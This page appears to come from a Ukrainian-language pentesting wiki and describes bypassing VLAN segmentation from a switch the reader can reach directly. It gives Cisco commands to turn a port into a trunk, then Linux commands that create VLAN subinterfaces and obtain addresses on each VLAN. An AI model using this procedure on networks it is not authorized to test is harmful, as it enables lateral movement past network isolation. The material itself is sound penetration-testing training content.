Lateral VLAN Segmentation Bypass

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Якщо є прямий доступ до комутатора, можна обійти сегментацію VLAN. Це включає переконфігурування підключеного порту на режим транка, встановлення віртуальних інтерфейсів для цільових VLAN та встановлення IP-адрес, або динамічно (DHCP), або статично, в залежності від сценарію (для докладнішої інформації перевірте https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9).

Спочатку потрібно ідентифікувати конкретний підключений порт. Це зазвичай можна зробити за допомогою повідомлень CDP або шляхом пошуку порту через маску include.

Якщо CDP не працює, ідентифікацію порту можна спробувати здійснити, шукаючи MAC-адресу:

SW1(config)# show mac address-table | include 0050.0000.0500

Перед переключенням на режим транка слід скласти список існуючих VLAN, визначити їх ідентифікатори. Ці ідентифікатори потім призначаються інтерфейсу, що дозволяє отримати доступ до різних VLAN через транк. Наприклад, порт, який використовується, пов'язаний з VLAN 10.

SW1# show vlan brief

Перехід до режиму транка передбачає введення режиму конфігурації інтерфейсу:

SW1(config)# interface GigabitEthernet 0/2
SW1(config-if)# switchport trunk encapsulation dot1q
SW1(config-if)# switchport mode trunk

Перемикання в режим транка тимчасово призведе до втрати зв'язку, але його можна відновити пізніше.

Створюються віртуальні інтерфейси, призначаються ідентифікатори VLAN та активуються:

sudo vconfig add eth0 10
sudo vconfig add eth0 20
sudo vconfig add eth0 50
sudo vconfig add eth0 60
sudo ifconfig eth0.10 up
sudo ifconfig eth0.20 up
sudo ifconfig eth0.50 up
sudo ifconfig eth0.60 up

Після цього відбувається запит адреси через DHCP. У випадках, коли DHCP не є придатним, адреси можуть бути налаштовані вручну:

sudo dhclient -v eth0.10
sudo dhclient -v eth0.20
sudo dhclient -v eth0.50
sudo dhclient -v eth0.60

Приклад вручного встановлення статичної IP-адреси на інтерфейсі (VLAN 10):

sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0

Підключення перевіряється шляхом ініціювання ICMP-запитів до шлюзів за замовчуванням для VLAN 10, 20, 50 та 60.

У кінцевому підсумку цей процес дозволяє обійти сегментацію VLAN, тим самим забезпечуючи необмежений доступ до будь-якої мережі VLAN та створюючи умови для подальших дій.

Посилання

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Last updated